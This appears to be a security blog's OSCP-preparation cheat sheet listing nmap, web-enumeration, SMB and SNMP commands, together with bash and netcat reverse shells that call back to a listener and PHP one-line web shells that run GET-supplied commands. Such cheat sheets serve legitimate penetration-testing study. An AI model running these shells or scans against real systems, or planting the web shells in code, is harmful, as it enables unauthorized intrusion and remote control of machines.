In previous article, we’ve shared a wide range of tools for sub-domain enumeration which helps pentesters and bug hunters collect and gather subdomains for the domain they are targeting.
Enumeration is the most important thing you can do, at that inevitable stage where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration.
There are a ton of certifications in this hacking and security domain but Offensive Security certifications are the ones that will really make you realize that you have actually earned it, rather than just crossed your fingers and did a MCQ exam.
Yes we’re talking about OSCP (Offensive Security Certified Professional). OSCP preparation, lab, and the exam is an awesome journey where you will experience lots of excitement, pain, suffering, frustration, confidence, and motivation where learning will be constant throughout the journey.
Below are the few commands which will be very helpful for OSCP preparation are as follows:
Nmap Commands
[#] Quick TCP Scan
Command: nmap -sC -sV -vv -oA quick 192.168.1.10
[#] Quick UDP Scan
Command: nmap -sU -sV -vv -oA quick_udp 192.168.1.10
[#] Full TCP Scan
Command: nmap -sC -sV -p- -vv -oA full 192.168.1.10
Web Scanning
[#] Nikto
Command: nikto -h 192.168.1.10
[#] Dirsearch
Command: python dirsearch.py -u http://192.168.1.10 -e php,txt,html,log,conf,cfg,ini,pdf -x 301,403,503,302 –random-agent
[#] Directory Buster
Command: dirb http://192.168.1.10/ /usr/share/wordlists/dirb/common.txt
[#] Whatweb
Command: whatweb -v -a 3 192.168.1.10
[#] Gobuster
Command: gobuster -e -u http://192.168.1.10/ -w /usr/share/wordlists/dirb/common.txt
[#] Wfuzz
Command: wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt –hc 404 http://192.168.1.10
[#] WPScan
Command: wpscan -u http://192.168.1.10/
[#] Joomscan
Command: joomscan -u http://192.168.1.10/
Port Checking
[#] Netcat Banner Grabbing
Command: nc -v 192.168.1.10 port
[#] Telnet Banner Grabbing
Command: telnet 192.168.1.10 port
SMB
[#] SMB Vulnerability Scan
Command: nmap -p 445 -vv –script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 192.168.1.10
[#] SMB Users & Shares Scan
Command: nmap -p 445 -vv –script=smb-enum-shares.nse,smb-enum-users.nse 192.168.1.10
[#] Enum4linux
Command: enum4linux -a 192.168.1.10
[#] Null connect
Command: rpcclient -U “” 192.168.1.10
[#] Connect to SMB share
Command: smbclient //MOUNT/share
SNMP
[#] SNMP Enumeration
Command: snmp-check 192.168.1.10 -c public
Python Servers
[#] Simple Web Server
Command: python -m SimpleHTTPServer 80
[#] FTP Server
Command: python -m pyftpdlib -p 21 -w
Reverse Shells
[#] Bash Shell
Command: bash -i >& /dev/tcp/192.168.1.10/4443 0>&1
[#] Netcat linux
Command: nc -e /bin/sh 192.168.1.10 4443
[#] Netcat windows
Command: nc -e cmd.exe 192.168.1.10 4443
PHP
[#] PHP command Injection with system from GET Request
Command: <?php echo system($_GET[“cmd”]);?>
[#] PHP Command Injection with Shell Exec from GET Request
Command: <?php echo shell_exec($_GET[“cmd”]);?>
SQL Injection
[#] SQL Injection Exploitation with Sqlmap
You may also like:Command: sqlmap -u http://10.10.10.10 –dbs
- How to Simulate Real-World Attacks for Better Security – The Red Teaming Approach
- How You Can Secure Your Cloud Environments with Blockchain Technology
- Best Practices for Secure Development within SSDL Framework
- How Machine Learning Enhances Cloud Security – A Comprehensive Guide
- The Role of Social Engineering in Penetration Testing
- A Beginner’s Guide to Digital Forensics and Cyber Investigations
- Blue Teaming – Tools and Strategies for Cyber Resilience
- Top 9 Best Practices for Securing Cloud Environments
- Top 10 Python Libraries for Visualizing Data
- Top 10 Emerging Threats in Cloud Security You Need To Know
